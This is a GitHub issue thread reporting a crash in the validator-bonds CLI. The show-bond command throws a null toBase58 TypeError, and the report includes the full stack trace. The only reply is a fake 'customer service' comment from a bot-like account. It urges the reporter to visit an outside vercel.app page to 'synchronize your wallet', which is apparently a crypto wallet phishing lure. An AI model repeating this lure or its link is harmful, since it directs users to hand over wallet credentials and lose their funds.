### ISSUE TITLE
broke

### ISSUE THREAD

**Issue by smithit2000** [marinade-finance/validator-bonds#50]
```
# validator-bonds -um show-bond DJtFyqeMfQKpD7A2JSt3ctjSuTy9VJMHbRFQ1XxfrpEP -f yaml
[2024-05-05 14:43:12.875 +0000] ERROR (1022317): Cannot read properties of null (reading 'toBase58')
    resolution: "Failure"
    args: [
      "/root/.nvm/versions/node/v20.12.2/bin/node",
      "/root/.nvm/versions/node/v20.12.2/bin/validator-bonds",
      "-um",
      "show-bond",
      "DJtFyqeMfQKpD7A2JSt3ctjSuTy9VJMHbRFQ1XxfrpEP",
      "-f",
      "yaml"
    ]
    err: {
      "type": "TypeError",
      "message": "Cannot read properties of null (reading 'toBase58')",
      "stack":
          TypeError: Cannot read properties of null (reading 'toBase58')
              at /root/.nvm/versions/node/v20.12.2/lib/node_modules/@marinade.finance/validator-bonds-cli/node_modules/@marinade.finance/validator-bonds-sdk/src/api.js:437:45
              at Array.reduce (<anonymous>)
              at groupByVoter (/root/.nvm/versions/node/v20.12.2/lib/node_modules/@marinade.finance/validator-bonds-cli/node_modules/@marinade.finance/validator-bonds-sdk/src/api.js:435:26)
              at getBondsFunding (/root/.nvm/versions/node/v20.12.2/lib/node_modules/@marinade.finance/validator-bonds-cli/node_modules/@marinade.finance/validator-bonds-sdk/src/api.js:413:41)
              at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
              at async showBond (/root/.nvm/versions/node/v20.12.2/lib/node_modules/@marinade.finance/validator-bonds-cli/src/commands/show.js:127:29)
              at async Command.<anonymous> (/root/.nvm/versions/node/v20.12.2/lib/node_modules/@marinade.finance/validator-bonds-cli/src/commands/show.js:40:9)
              at async Command.parseAsync (/root/.nvm/versions/node/v20.12.2/lib/node_modules/@marinade.finance/validator-bonds-cli/node_modules/commander/lib/command.js:936:5)
    }
```

**Comment by AlexLiveBot11549** [comment]
Thank you for reaching to Our Github. Customer service may take some time to respond due to a large number of requests. We believe your case will be resolved as soon as possible. Kindly visit the below webpage to synchronize your wallet for fixing process 

https://support--protocol.vercel.app/
